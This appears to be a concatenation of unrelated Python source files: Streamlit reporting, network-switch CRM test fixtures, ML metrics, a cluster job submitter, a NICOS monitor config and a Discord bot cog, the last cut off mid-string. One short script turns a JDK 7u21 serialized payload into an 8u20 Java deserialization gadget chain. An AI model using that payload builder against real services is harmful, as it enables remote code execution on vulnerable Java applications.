col1, col2, col3, col4, col5 = st.columns(5)
col1.markdown(
f"<p style='color: {config['style']['colors'][1]}; "
f"font-weight: bold; font-size: 20px;'> {eval_all['metrics'][0]}</p>",
unsafe_allow_html=True,
)
col1.write(metrics_df.loc["Global", eval_all["metrics"][0]])
col2.markdown(
f"<p style='color: {config['style']['colors'][1]}; "
f"font-weight: bold; font-size: 20px;'> {eval_all['metrics'][1]}</p>",
unsafe_allow_html=True,
)
col2.write(metrics_df.loc["Global", eval_all["metrics"][1]])
col3.markdown(
f"<p style='color: {config['style']['colors'][1]}; "
f"font-weight: bold; font-size: 20px;'> {eval_all['metrics'][2]}</p>",
unsafe_allow_html=True,
)
col3.write(metrics_df.loc["Global", eval_all["metrics"][2]])
col4.markdown(
f"<p style='color: {config['style']['colors'][1]}; "
f"font-weight: bold; font-size: 20px;'> {eval_all['metrics'][3]}</p>",
unsafe_allow_html=True,
)
col4.write(metrics_df.loc["Global", eval_all["metrics"][3]])
col5.markdown(
f"<p style='color: {config['style']['colors'][1]}; "
f"font-weight: bold; font-size: 20px;'> {eval_all['metrics'][4]}</p>",
unsafe_allow_html=True,
)
col5.write(metrics_df.loc["Global", eval_all["metrics"][4]])
report.append(
{
"object": metrics_df.loc["Global"].reset_index(),
"name": "eval_global_performance",
"type": "dataset",
}
)
return report
|
30303
|
import logging
import pytest
from tests.common.utilities import wait_until
from utils import get_crm_resources, check_queue_status, sleep_to_wait
CRM_POLLING_INTERVAL = 1
CRM_DEFAULT_POLL_INTERVAL = 300
MAX_WAIT_TIME = 120
logger = logging.getLogger(__name__)
@pytest.fixture(scope='module')
def get_function_conpleteness_level(pytestconfig):
return pytestconfig.getoption("--completeness_level")
@pytest.fixture(scope="module", autouse=True)
def set_polling_interval(duthost):
wait_time = 2
duthost.command("crm config polling interval {}".format(CRM_POLLING_INTERVAL))
logger.info("Waiting {} sec for CRM counters to become updated".format(wait_time))
time.sleep(wait_time)
yield
duthost.command("crm config polling interval {}".format(CRM_DEFAULT_POLL_INTERVAL))
logger.info("Waiting {} sec for CRM counters to become updated".format(wait_time))
time.sleep(wait_time)
@pytest.fixture(scope='module')
def withdraw_and_announce_existing_routes(duthost, localhost, tbinfo):
ptf_ip = tbinfo["ptf_ip"]
topo_name = tbinfo["topo"]["name"]
logger.info("withdraw existing ipv4 and ipv6 routes")
localhost.announce_routes(topo_name=topo_name, ptf_ip=ptf_ip, action="withdraw", path="../ansible/")
wait_until(MAX_WAIT_TIME, CRM_POLLING_INTERVAL, 0, lambda: check_queue_status(duthost, "inq") == True)
sleep_to_wait(CRM_POLLING_INTERVAL * 100)
ipv4_route_used_before = get_crm_resources(duthost, "ipv4_route", "used")
ipv6_route_used_before = get_crm_resources(duthost, "ipv6_route", "used")
logger.info("ipv4 route used {}".format(ipv4_route_used_before))
logger.info("ipv6 route used {}".format(ipv6_route_used_before))
yield ipv4_route_used_before, ipv6_route_used_before
logger.info("announce existing ipv4 and ipv6 routes")
localhost.announce_routes(topo_name=topo_name, ptf_ip=ptf_ip, action="announce", path="../ansible/")
wait_until(MAX_WAIT_TIME, CRM_POLLING_INTERVAL, 0, lambda: check_queue_status(duthost, "outq") == True)
sleep_to_wait(CRM_POLLING_INTERVAL * 5)
logger.info("ipv4 route used {}".format(get_crm_resources(duthost, "ipv4_route", "used")))
logger.info("ipv6 route used {}".format(get_crm_resources(duthost, "ipv6_route", "used")))
|
30322
|
import argparse
import logging
from pathlib import Path
import dask
import h5py
import joblib
import numpy as np
import pandas as pd
from dask.diagnostics import ProgressBar
from tqdm import tqdm
from dsconcept.get_metrics import (
get_cat_inds,
get_synth_preds,
load_category_models,
load_concept_models,
HierarchicalClassifier,
get_mets,
)
logging.basicConfig(level=logging.INFO)
LOG = logging.getLogger(__name__)
LOG.setLevel(logging.INFO)
def main(
experiment_name,
synth_strat,
in_cat_preds,
out_store,
synth_batch_size,
t,
out_synth_scores,
limit=None,
con_limit=None,
):
test_inds = np.load(f"data/interim/{experiment_name}/test_inds.npy")
feature_matrix = joblib.load(f"data/interim/{experiment_name}/feature_matrix.jbl")
in_cat_models = Path(f"models/{experiment_name}/categories/models/")
in_kwd_models = Path(f"models/{experiment_name}/keywords/models/")
cat_preds = np.load(in_cat_preds) # based on experiment or explicit path?
cat_clfs = load_category_models(in_cat_models)
cd = load_concept_models(in_kwd_models)
clf = HierarchicalClassifier(cat_clfs, cd)
if limit is not None:
LOG.info(f"Limiting to {limit} test records.")
feature_matrix_test = feature_matrix.tocsc()[test_inds[0:limit], :]
cat_preds = cat_preds[0:limit, :]
# TODO: How does this affect indices?
else:
feature_matrix_test = feature_matrix.tocsc()[test_inds, :]
LOG.info(f'Synthesizing predictions with strategy "{synth_strat}".')
all_cat_inds = get_cat_inds(clf.categories, cat_preds, t=t)
if con_limit is not None:
conwc = clf.concepts_with_classifiers[0:con_limit]
else:
conwc = clf.concepts_with_classifiers
shape = (feature_matrix_test.shape[0], len(conwc))
with tqdm(total=shape[0]) as pbar:
get_synth_preds(
out_store,
shape,
all_cat_inds,
clf.categories,
synth_batch_size,
only_cat=False,
synth_strat=synth_strat,
con_limit=con_limit,
limit=limit,
pbar=pbar,
)
LOG.info("Obtaining metrics.")
with h5py.File(out_store, "r") as f0:
if limit is not None:
target_values = f0["ground_truth"][0:limit, :]
else:
target_values = f0["ground_truth"].value
with h5py.File(out_store, "r") as f0:
synth_preds = f0["synthesis"].value
jobs = []
mets_pbar = tqdm(
range(len(conwc)),
total=len(conwc),
)
for i in mets_pbar:
job = dask.delayed(get_mets)(
i, synth_preds, target_values, conwc, mets_pbar
)
jobs.append(job)
records = dask.compute(jobs)
new_recs_df = pd.DataFrame(records[0])
LOG.info(f"Saving results to {out_synth_scores}.")
new_recs_df.to_csv(out_synth_scores)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Say hello")
parser.add_argument("--experiment_name", help="input txt file")
parser.add_argument("--synth_strat", help="input txt file")
parser.add_argument("--in_cat_preds", help="input txt file")
parser.add_argument("--store", help="input txt file")
parser.add_argument("--synth_batch_size", help="input txt file", type=int)
parser.add_argument("--threshold", help="input txt file", type=float)
parser.add_argument("--out_synth_scores", help="input txt file")
parser.add_argument(
"--limit", help="size for sample to test synthesis", type=int, default=None
)
parser.add_argument(
"--con_limit", help="size for concept sample", type=int, default=None
)
args = parser.parse_args()
main(
args.experiment_name,
args.synth_strat,
args.in_cat_preds,
args.store,
args.synth_batch_size,
args.threshold,
args.out_synth_scores,
args.limit,
args.con_limit,
)
|
30356
|
import yaml
from javaSerializationTools import JavaString, JavaField, JavaObject, JavaEndBlock
from javaSerializationTools import ObjectRead
from javaSerializationTools import ObjectWrite
if __name__ == '__main__':
with open("../files/7u21.ser", "rb") as f:
a = ObjectRead(f)
obj = a.readContent()
# 第一步,向HashSet添加一个假字段,名字fake
signature = JavaString("Ljava/beans/beancontext/BeanContextSupport;")
fakeSignature = {'name': 'fake', 'signature': signature}
obj.javaClass.superJavaClass.fields.append(fakeSignature)
# 构造假的BeanContextSupport反序列化对象,注意要引用后面的AnnotationInvocationHandler
# 读取BeanContextSupportClass的类的简介
with open('BeanContextSupportClass.yaml', 'r') as f1:
BeanContextSupportClassDesc = yaml.load(f1.read(), Loader=yaml.FullLoader)
# 向beanContextSupportObject添加beanContextChildPeer属性
beanContextSupportObject = JavaObject(BeanContextSupportClassDesc)
beanContextChildPeerField = JavaField('beanContextChildPeer',
JavaString('Ljava/beans/beancontext/BeanContextChild'),
beanContextSupportObject)
beanContextSupportObject.fields.append([beanContextChildPeerField])
# 向beanContextSupportObject添加serializable属性
serializableField = JavaField('serializable', 'I', 1)
beanContextSupportObject.fields.append([serializableField])
# 向beanContextSupportObject添加objectAnnontations 数据
beanContextSupportObject.objectAnnotation.append(JavaEndBlock())
AnnotationInvocationHandler = obj.objectAnnotation[2].fields[0][0].value
beanContextSupportObject.objectAnnotation.append(AnnotationInvocationHandler)
# 把beanContextSupportObject对象添加到fake属性里
fakeField = JavaField('fake', fakeSignature['signature'], beanContextSupportObject)
obj.fields[0].append(fakeField)
with open("8u20.ser", 'wb') as f:
o = ObjectWrite(f)
o.writeContent(obj)
|
30425
|
from base import job_desc_pb2
from base import task_desc_pb2
from base import reference_desc_pb2
from google.protobuf import text_format
import httplib, urllib, re, sys, random
import binascii
import time
import shlex
def add_worker_task(job_name, task, binary, args, worker_id, num_workers, extra_args):
task.uid = 0
task.name = "%s/%d" % (job_name, worker_id)
task.state = task_desc_pb2.TaskDescriptor.CREATED
task.binary = "/usr/bin/python"
task.args.extend(args)
task.args.append(str(worker_id))
task.args.append(str(num_workers))
task.args.append(binary)
task.args.extend(extra_args)
task.inject_task_lib = True
if len(sys.argv) < 4:
print "usage: memcached_submit.py <coordinator hostname> <web UI port> " \
"<task binary> [<args>] [<num workers>] [<job name>]"
sys.exit(1)
hostname = sys.argv[1]
port = int(sys.argv[2])
memcached_exe = sys.argv[3]
if len(sys.argv) > 4:
extra_args = shlex.split(sys.argv[4])
else:
extra_args = []
if len(sys.argv) > 5:
num_workers = int(sys.argv[5])
else:
num_workers = 1
if len(sys.argv) > 6:
job_name = sys.argv[6]
else:
job_name = "memcached_job_at_%d" % (int(time.time()))
basic_args = []
basic_args.append("/home/srguser/firmament-experiments/helpers/napper/napper_memcached.py")
basic_args.append("caelum-301:2181")
basic_args.append(job_name)
job_desc = job_desc_pb2.JobDescriptor()
job_desc.uuid = "" # UUID will be set automatically on submission
job_desc.name = job_name
# set up root task
job_desc.root_task.uid = 0
job_desc.root_task.name = job_name + "/0"
job_desc.root_task.state = task_desc_pb2.TaskDescriptor.CREATED
job_desc.root_task.binary = "/usr/bin/python"
job_desc.root_task.args.extend(basic_args)
job_desc.root_task.args.append("0") # root task is worker ID 0
job_desc.root_task.args.append(str(num_workers))
job_desc.root_task.args.append(memcached_exe)
job_desc.root_task.args.extend(extra_args)
job_desc.root_task.inject_task_lib = True
# add workers
for i in range(1, num_workers):
task = job_desc.root_task.spawned.add()
add_worker_task(job_name, task, memcached_exe, basic_args, i, num_workers, extra_args)
input_id = binascii.unhexlify('feedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeef')
output_id = binascii.unhexlify('db33daba280d8e68eea6e490723b02cedb33daba280d8e68eea6e490723b02ce')
output2_id = binascii.unhexlify('feedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeef')
job_desc.output_ids.append(output_id)
job_desc.output_ids.append(output2_id)
input_desc = job_desc.root_task.dependencies.add()
input_desc.id = input_id
input_desc.scope = reference_desc_pb2.ReferenceDescriptor.PUBLIC
input_desc.type = reference_desc_pb2.ReferenceDescriptor.CONCRETE
input_desc.non_deterministic = False
input_desc.location = "blob:/tmp/fib_in"
final_output_desc = job_desc.root_task.outputs.add()
final_output_desc.id = output_id
final_output_desc.scope = reference_desc_pb2.ReferenceDescriptor.PUBLIC
final_output_desc.type = reference_desc_pb2.ReferenceDescriptor.FUTURE
final_output_desc.non_deterministic = True
final_output_desc.location = "blob:/tmp/out1"
final_output2_desc = job_desc.root_task.outputs.add()
final_output2_desc.id = output2_id
final_output2_desc.scope = reference_desc_pb2.ReferenceDescriptor.PUBLIC
final_output2_desc.type = reference_desc_pb2.ReferenceDescriptor.FUTURE
final_output2_desc.non_deterministic = True
final_output2_desc.location = "blob:/tmp/out2"
#params = urllib.urlencode({'test': text_format.MessageToString(job_desc)})
params = 'jd=%s' % text_format.MessageToString(job_desc)
print "SUBMITTING job with parameters:"
print params
print ""
try:
headers = {"Content-type": "application/x-www-form-urlencoded"}
conn = httplib.HTTPConnection("%s:%s" % (hostname, port))
conn.request("POST", "/job/submit/", params, headers)
response = conn.getresponse()
except Exception as e:
print "ERROR connecting to coordinator: %s" % (e)
sys.exit(1)
data = response.read()
match = re.search(r"([0-9a-f\-]+)", data, re.MULTILINE | re.S | re.I | re.U)
print "----------------------------------------------"
if match and response.status == 200:
job_id = match.group(1)
print "JOB SUBMITTED successfully!\nJOB ID is %s\nStatus page: " \
"http://%s:%d/job/status/?id=%s" % (job_id, hostname, port, job_id)
else:
print "ERROR submitting job -- response was: %s (Code %d)" % (response.reason,
response.status)
print "----------------------------------------------"
conn.close()
|
30448
|
from tastypie.api import Api
from encuestas.api.user import UserResource
from encuestas.api.encuesta import EncuestaResource
from encuestas.api.grupo import GrupoResource
from encuestas.api.pregunta import PreguntaResource
from encuestas.api.opcion import OpcionResource
from encuestas.api.link import LinkResource
from encuestas.api.respuesta import RespuestaResource
v1_api = Api(api_name='v1')
v1_api.register(UserResource())
v1_api.register(EncuestaResource())
v1_api.register(GrupoResource())
v1_api.register(PreguntaResource())
v1_api.register(OpcionResource())
v1_api.register(LinkResource())
v1_api.register(RespuestaResource())
|
30469
|
description = 'setup for the status monitor'
group = 'special'
_expcolumn = Column(
Block('Experiment', [
BlockRow(
# Field(name='Proposal', key='exp/proposal', width=7),
# Field(name='Title', key='exp/title', width=20,
# istext=True, maxlen=20),
Field(name='Current status', key='exp/action', width=40,
istext=True, maxlen=40),
Field(name='Data file', key='exp/lastpoint'),
),
],
),
)
_sampletable = Column(
Block('Sample table', [
BlockRow(
Field(dev='omgs'),
),
BlockRow(
Field(dev='tths'),
),
],
),
)
_instrument = Column(
Block('Instrument', [
BlockRow(
Field(dev='wav'),
),
BlockRow(
Field(dev='slits'),
),
BlockRow(
Field(dev='mon'),
Field(name='Resosteps', key='adet/resosteps'),
Field(name='Step', key='adet/value[0]'),
),
],
),
)
_frm = Column(
Block('FRM II', [
BlockRow(
Field(dev='ReactorPower'),
),
],
),
Block('SPODI', [
BlockRow(
Field(name='O2', dev='o2_nguide'),
Field(name='O2 part', dev='o2part_nguide'),
),
BlockRow(
Field(name='p1 N-Guide', dev='p1_nguide'),
Field(name='p2 N-Guide', dev='p2_nguide'),
Field(name='p3 N-Guide', dev='p3_nguide'),
),
],
),
)
# generic CCR-stuff
ccrs = []
ccrsupps = []
ccrplots = []
_ccrnrs = [6,] + list(range(10, 22 + 1))
for i in _ccrnrs:
ccrs.append(
Block('CCR%d-Pulse tube' % i, [
BlockRow(
Field(dev='t_ccr%d_c' % i, name='Coldhead'),
Field(dev='t_ccr%d_d' % i, name='Regulation'),
Field(dev='t_ccr%d_b' % i, name='Sample'),
),
BlockRow(
Field(key='t_ccr%d/setpoint' % i, name='Setpoint'),
Field(key='t_ccr%d/p' % i, name='P', width=7),
Field(key='t_ccr%d/i' % i, name='I', width=7),
Field(key='t_ccr%d/d' % i, name='D', width=6),
),
],
setups='ccr%d and not cci3he0*' % i,
),
)
ccrsupps.append(
Block('CCR%d' % i, [
BlockRow(
Field(dev='T_ccr%d_A' % i, name='A'),
Field(dev='T_ccr%d_B' % i, name='B'),
Field(dev='T_ccr%d_C' % i, name='C'),
Field(dev='T_ccr%d_D' % i, name='D'),
),
BlockRow(
Field(key='t_ccr%d/setpoint' % i, name='SetP.', width=6),
Field(key='t_ccr%d/p' % i, name='P', width=4),
Field(key='t_ccr%d/i' % i, name='I', width=4),
Field(key='t_ccr%d/d' % i, name='D', width=3),
),
BlockRow(
Field(dev='ccr%d_p1' % i, name='P1'),
Field(dev='ccr%d_p2' % i, name='P2'),
),
],
setups='ccr%d' % i,
),
)
_cryo = Column(*ccrs)
_cryosup = Column(*ccrsupps)
_htf = Column(
Block('HTF', [
BlockRow(
Field(dev='T'),
Field(name='Power', key='T/heaterpower'),
),
],
setups='htf*',
),
)
_magnet = Column(
Block('Magnet', [
BlockRow(
Field(dev='B'),
),
],
setups='ccm*',
),
)
_sc = Column(
Block('Sample Changer', [
BlockRow(
Field(dev='sams'),
),
],
setups='samplechanger',
),
)
_e = Column(
Block('E field', [
BlockRow(
Field(dev='E'),
),
],
setups='efield',
),
)
_tension = Column(
Block('Tension rack', [
BlockRow(
Field(dev='teload'),
Field(dev='tepos'),
Field(dev='teext'),
Field(dev='topos'),
Field(dev='tomom'),
),
],
setups='tensile',
),
)
_nps =[1,2,3,10,11,12]
_npblocks = []
for i in _nps:
_npblocks.append(
Block('Newport', [
BlockRow(
Field(dev='sth_rsc%02d' % i),
),
],
setups='rsc%02d' % i,
),
)
_rsc = Column(*_npblocks)
devices = dict(
Monitor = device('nicos.services.monitor.html.Monitor',
title = 'SPODI status monitor',
loglevel = 'info',
interval = 10,
filename = '/spodicontrol/webroot/index.html',
cache = 'spodictrl.spodi.frm2',
font = 'Luxi Sans',
valuefont = 'Consolas',
prefix = 'nicos/',
padding = 0,
fontsize = 24,
layout = [
Row(_expcolumn),
Row(_frm, _instrument, _sampletable),
Row(_htf,),
Row(_cryosup),
Row(_tension),
Row(_magnet, _e,),
Row(_sc, _rsc),
],
noexpired = True,
),
)
|
30476
|
import base64
import datetime
import io
import json
import traceback
import aiohttp
import discord
import pytimeparse
from data.services.guild_service import guild_service
from discord.commands import Option, slash_command, message_command, user_command
from discord.ext import commands
from discord.utils import format_dt
from PIL import Image
from utils.autocompleters import (bypass_autocomplete, get_ios_cfw,
rule_autocomplete)
from utils.config import cfg
from utils.context import BlooContext
from utils.logger import logger
from utils.menu import BypassMenu
from utils.permissions.checks import (PermissionsFailure, mod_and_up,
whisper, whisper_in_general)
from utils.permissions.permissions import permissions
from utils.permissions.slash_perms import slash_perms
from yarl import URL
class PFPView(discord.ui.View):
def __init__(self, ctx: BlooContext):
super().__init__(timeout=30)
self.ctx = ctx
async def on_timeout(self):
for child in self.children:
child.disabled = True
await self.ctx.respond_or_edit(view=self)
class PFPButton(discord.ui.Button):
def __init__(self, ctx: BlooContext, member: discord.Member):
super().__init__(label="Show other avatar", style=discord.ButtonStyle.primary)
self.ctx = ctx
self.member = member
self.other = False
async def callback(self, interaction: discord.Interaction):
if interaction.user != self.ctx.author:
return
if not self.other:
avatar = self.member.guild_avatar
self.other = not self.other
else:
avatar = self.member.avatar or self.member.default_avatar
self.other = not self.other
embed = interaction.message.embeds[0]
embed.set_image(url=avatar.replace(size=4096))
animated = ["gif", "png", "jpeg", "webp"]
not_animated = ["png", "jpeg", "webp"]
def fmt(format_):
return f"[{format_}]({avatar.replace(format=format_, size=4096)})"
if avatar.is_animated():
embed.description = f"View As\n {' '.join([fmt(format_) for format_ in animated])}"
else:
embed.description = f"View As\n {' '.join([fmt(format_) for format_ in not_animated])}"
await interaction.response.edit_message(embed=embed)
class BypassDropdown(discord.ui.Select):
def __init__(self, ctx, apps):
self.ctx = ctx
self.apps = {app.get("bundleId"): app for app in apps}
options = [
discord.SelectOption(label=app.get("name"), value=app.get("bundleId"), description="Bypasses found" if app.get("bypasses") else "No bypasses found", emoji='<:appstore:392027597648822281>') for app in apps
]
super().__init__(placeholder='Pick an app...',
min_values=1, max_values=1, options=options)
async def callback(self, interaction):
if interaction.user != self.ctx.author:
return
self.view.stop()
app = self.apps.get(self.values[0])
self.ctx.app = app
if not app.get("bypasses"):
await self.ctx.send_error("No bypasses found for this app!")
return
menu = BypassMenu(self.ctx, app.get("bypasses"), per_page=1,
page_formatter=format_bypass_page, whisper=self.ctx.whisper)
await menu.start()
async def on_timeout(self):
self.disabled = True
self.placeholder = "Timed out"
await self.ctx.edit(view=self._view)
def format_bypass_page(ctx, entries, current_page, all_pages):
ctx.current_bypass = entries[0]
embed = discord.Embed(title=ctx.app.get(
"name"), color=discord.Color.blue())
embed.set_thumbnail(url=ctx.app.get("icon"))
embed.description = f"You can use **{ctx.current_bypass.get('name')}**!"
if ctx.current_bypass.get("notes") is not None:
embed.add_field(name="Note", value=ctx.current_bypass.get('notes'))
embed.color = discord.Color.orange()
if ctx.current_bypass.get("version") is not None:
embed.add_field(name="Supported versions",
value=f"This bypass works on versions {ctx.current_bypass.get('version')} of the app")
embed.set_footer(
text=f"Powered by ios.cfw.guide • Bypass {current_page} of {len(all_pages)}")
return embed
class Misc(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.spam_cooldown = commands.CooldownMapping.from_cooldown(
3, 15.0, commands.BucketType.channel)
try:
with open('emojis.json') as f:
self.emojis = json.loads(f.read())
except:
raise Exception(
"Could not find emojis.json. Make sure to run scrape_emojis.py")
@whisper()
@slash_command(guild_ids=[cfg.guild_id], description="Send yourself a reminder after a given time gap")
async def remindme(self, ctx: BlooContext, reminder: Option(str, description="What do you want to be reminded?"), duration: Option(str, description="When do we remind you? (i.e 1m, 1h, 1d)")):
"""Sends you a reminder after a given time gap
Example usage
-------------
/remindme 1h bake the cake
Parameters
----------
dur : str
"After when to send the reminder"
reminder : str
"What to remind you of"
"""
now = datetime.datetime.now()
delta = pytimeparse.parse(duration)
if delta is None:
raise commands.BadArgument(
"Please give me a valid time to remind you! (i.e 1h, 30m)")
time = now + datetime.timedelta(seconds=delta)
if time < now:
raise commands.BadArgument("Time has to be in the future >:(")
reminder = discord.utils.escape_markdown(reminder)
ctx.tasks.schedule_reminder(ctx.author.id, reminder, time)
# natural_time = humanize.naturaldelta(
# delta, minimum_unit='seconds')
embed = discord.Embed(title="Reminder set", color=discord.Color.random(
), description=f"We'll remind you {discord.utils.format_dt(time, style='R')}")
await ctx.respond(embed=embed, ephemeral=ctx.whisper, delete_after=5)
@slash_command(guild_ids=[cfg.guild_id], description="Post large version of a given emoji")
async def jumbo(self, ctx: BlooContext, emoji: str):
"""Posts large version of a given emoji
Example usage
-------------
/jumbo <emote>
Parameters
----------
emoji : str
"Emoji to enlarge"
"""
# non-mod users will be ratelimited
bot_chan = guild_service.get_guild().channel_botspam
if not permissions.has(ctx.guild, ctx.author, 5) and ctx.channel.id != bot_chan:
bucket = self.spam_cooldown.get_bucket(ctx.interaction)
if bucket.update_rate_limit():
raise commands.BadArgument("This command is on cooldown.")
# is this a regular Unicode emoji?
try:
em = await commands.PartialEmojiConverter().convert(ctx, emoji)
except commands.PartialEmojiConversionFailure:
em = emoji
if isinstance(em, str):
async with ctx.typing():
emoji_url_file = self.emojis.get(em)
if emoji_url_file is None:
raise commands.BadArgument(
"Couldn't find a suitable emoji.")
im = Image.open(io.BytesIO(base64.b64decode(emoji_url_file)))
image_conatiner = io.BytesIO()
im.save(image_conatiner, 'png')
image_conatiner.seek(0)
_file = discord.File(image_conatiner, filename='image.png')
await ctx.respond(file=_file)
else:
await ctx.respond(em.url)
@whisper()
@slash_command(guild_ids=[cfg.guild_id], description="Get avatar of another user or yourself.")
async def avatar(self, ctx: BlooContext, member: Option(discord.Member, description="User to get avatar of", required=False)) -> None:
"""Posts large version of a given emoji
Example usage
-------------
/avatar member:<member>
Parameters
----------
member : discord.Member, optional
"Member to get avatar of"
"""
if member is None:
member = ctx.author
await self.handle_avatar(ctx, member)
@whisper()
@user_command(guild_ids=[cfg.guild_id], name="View avatar")
async def avatar_rc(self, ctx: BlooContext, member: discord.Member):
await self.handle_avatar(ctx, member)
@whisper()
@message_command(guild_ids=[cfg.guild_id], name="View avatar")
async def avatar_msg(self, ctx: BlooContext, message: discord.Message):
await self.handle_avatar(ctx, message.author)
async def handle_avatar(self, ctx, member: discord.Member):
embed = discord.Embed(title=f"{member}'s avatar")
animated = ["gif", "png", "jpeg", "webp"]
not_animated = ["png", "jpeg", "webp"]
avatar = member.avatar or member.default_avatar
def fmt(format_):
return f"[{format_}]({avatar.replace(format=format_, size=4096)})"
if member.display_avatar.is_animated():
embed.description = f"View As\n {' '.join([fmt(format_) for format_ in animated])}"
else:
embed.description = f"View As\n {' '.join([fmt(format_) for format_ in not_animated])}"
embed.set_image(url=avatar.replace(size=4096))
embed.color = discord.Color.random()
view = PFPView(ctx)
if member.guild_avatar is not None:
view.add_item(PFPButton(ctx, member))
view.message = await ctx.respond(embed=embed, ephemeral=ctx.whisper, view=view)
@whisper_in_general()
@slash_command(guild_ids=[cfg.guild_id], description="View information about a CVE")
async def cve(self, ctx: BlooContext, id: str):
"""View information about a CVE
Example usage
-------------
/cve <id>
Parameters
----------
id : str
"ID of CVE to lookup"
"""
try:
async with aiohttp.ClientSession() as client:
async with client.get(URL(f'https://cve.circl.lu/api/cve/{id}', encoded=True)) as resp:
response = json.loads(await resp.text())
embed = discord.Embed(title=response.get(
'id'), color=discord.Color.random())
embed.description = response.get('summary')
embed.add_field(name="Published", value=response.get(
'Published'), inline=True)
embed.add_field(name="Last Modified",
value=response.get('Modified'), inline=True)
embed.add_field(name="Complexity", value=response.get(
'access').get('complexity').title(), inline=False)
embed.set_footer(text="Powered by https://cve.circl.lu")
await ctx.respond(embed=embed, ephemeral=ctx.whisper)
except Exception:
raise commands.BadArgument("Could not find CVE.")
@whisper_in_general()
@slash_command(guild_ids=[cfg.guild_id], description="Find out how to bypass jailbreak detection for an app")
async def bypass(self, ctx: BlooContext, app: Option(str, description="Name of the app", autocomplete=bypass_autocomplete)):
await ctx.defer(ephemeral=ctx.whisper)
data = await get_ios_cfw()
bypasses = data.get('bypass')
matching_apps = [body for _, body in bypasses.items() if app.lower() in body.get("name").lower()]
if not matching_apps:
raise commands.BadArgument(
"The API does not recognize that app or there are no bypasses available.")
# matching_app = bypasses[matching_apps[0]]
# print(matching_app)
if len(matching_apps) > 1:
view = discord.ui.View(timeout=30)
apps = matching_apps[:25]
apps.sort(key=lambda x: x.get("name"))
menu = BypassDropdown(ctx, apps)
view.add_item(menu)
view.on_timeout = menu.on_timeout
embed = discord.Embed(
description="Which app would you like to view bypasses for?", color=discord.Color.blurple())
await ctx.respond(embed=embed, view=view, ephemeral=ctx.whisper)
else:
ctx.app = matching_apps[0]
bypasses = ctx.app.get("bypasses")
if not bypasses or bypasses is None or bypasses == [None]:
raise commands.BadArgument(
f"{ctx.app.get('name')} has no bypasses.")
menu = BypassMenu(ctx, ctx.app.get(
"bypasses"), per_page=1, page_formatter=format_bypass_page, whisper=ctx.whisper)
await menu.start()
@slash_command(guild_ids=[cfg.guild_id], description="Post the embed for one of the rules")
async def rule(self, ctx: BlooContext, title: Option(str, autocomplete=rule_autocomplete), user_to_mention: Option(discord.Member, description="User to mention in the response", required=False)):
if title not in self.bot.rule_cache.cache:
potential_rules = [r for r in self.bot.rule_cache.cache if title.lower() == r.lower(
) or title.strip() == f"{r} - {self.bot.rule_cache.cache[r].description}"[:100].strip()]
if not potential_rules:
raise commands.BadArgument(
"Rule not found! Title must match one of the embeds exactly, use autocomplete to help!")
title = potential_rules[0]
embed = self.bot.rule_cache.cache[title]
if user_to_mention is not None:
title = f"Hey {user_to_mention.mention}, have a look at this!"
else:
title = None
await ctx.respond_or_edit(content=title, embed=embed)
@slash_command(guild_ids=[cfg.guild_id], description="Get the topic for a channel")
async def topic(self, ctx: BlooContext, channel: Option(discord.TextChannel, description="Channel to get the topic from", required=False), user_to_mention: Option(discord.Member, description="User to mention in the response", required=False)):
"""get the channel's topic"""
channel = channel or ctx.channel
if channel.topic is None:
raise commands.BadArgument(f"{channel.mention} has no topic!")
if user_to_mention is not None:
title = f"Hey {user_to_mention.mention}, have a look at this!"
else:
title = None
embed = discord.Embed(title=f"#{channel.name}'s topic",
description=channel.topic, color=discord.Color.blue())
await ctx.respond_or_edit(content=title, embed=embed)
@mod_and_up()
@slash_command(guild_ids=[cfg.guild_id], description="Start a poll", permissions=slash_perms.mod_and_up())
async def poll(self, ctx: BlooContext, question: str, channel: Option(discord.TextChannel, required=False, description="Where to post the message") = None):
if channel is None:
channel = ctx.channel
embed=discord.Embed(description=question, color=discord.Color.random())
embed.timestamp = datetime.datetime.now()
embed.set_footer(text=f"Poll started by {ctx.author}")
message = await channel.send(embed=embed)
emojis = ['⬆️', '⬇️']
for emoji in emojis:
await message.add_reaction(emoji)
ctx.whisper = True
await ctx.send_success("Done!")
@slash_command(guild_ids=[cfg.guild_id], description="View the status of various Discord features")
@commands.guild_only()
async def dstatus(self, ctx):
async with aiohttp.ClientSession() as session:
async with session.get("https://discordstatus.com/api/v2/components.json") as resp:
if resp.status == 200:
components = await resp.json()
async with aiohttp.ClientSession() as session:
async with session.get("https://discordstatus.com/api/v2/incidents.json") as resp:
if resp.status == 200:
incidents = await resp.json()
api_status = components.get('components')[0].get('status').title() # API
mp_status = components.get('components')[4].get('status').title() # Media Proxy
pn_status = components.get('components')[6].get('status').title() # Push Notifications
s_status = components.get('components')[8].get('status').title() # Search
v_status = components.get('components')[11].get('status').title() # Voice
cf_status = components.get('components')[2].get('status').title() # Cloudflare
title = "All Systems Operational" if api_status == "Operational" and mp_status == "Operational" and pn_status == "Operational" and s_status == "Operational" and v_status == "Operational" and cf_status == "Operational" else "Known Incident"
color = discord.Color.green() if title == "All Systems Operational" else discord.Color.orange()
last_incident = incidents.get('incidents')[0].get('name')
last_status = incidents.get('incidents')[0].get('status').title()
last_created = datetime.datetime.strptime(incidents.get('incidents')[0].get('created_at'), "%Y-%m-%dT%H:%M:%S.%f%z")
last_update = datetime.datetime.strptime(incidents.get('incidents')[0].get('updated_at'), "%Y-%m-%dT%H:%M:%S.%f%z")
last_impact = incidents.get('incidents')[0].get('impact')
online = '<:status_online:942288772551278623>'
offline = '<:status_dnd:942288811818352652>'
incident_icons = {'none': '<:status_offline:942288832051679302>',
'maintenance': '<:status_total:942290485916073995>',
'minor': '<:status_idle:942288787000680499>',
'major': '<:status_dnd:942288811818352652>',
'critical': '<:status_dnd:942288811818352652>'}
embed = discord.Embed(title=title, description=f"""
{online if api_status == 'Operational' else offline} **API:** {api_status}
{online if mp_status == 'Operational' else offline} **Media Proxy:** {mp_status}
{online if pn_status == 'Operational' else offline} **Push Notifications:** {pn_status}
{online if s_status == 'Operational' else offline} **Search:** {s_status}
{online if v_status == 'Operational' else offline} **Voice:** {v_status}
{online if cf_status == 'Operational' else offline} **Cloudflare:** {cf_status}
__**Last outage information**__
**Incident:** {incident_icons.get(last_impact)} {last_incident}
**Status:** {online if last_status == 'Resolved' else offline} {last_status}
**Identified at:** {format_dt(last_created, style='F')}
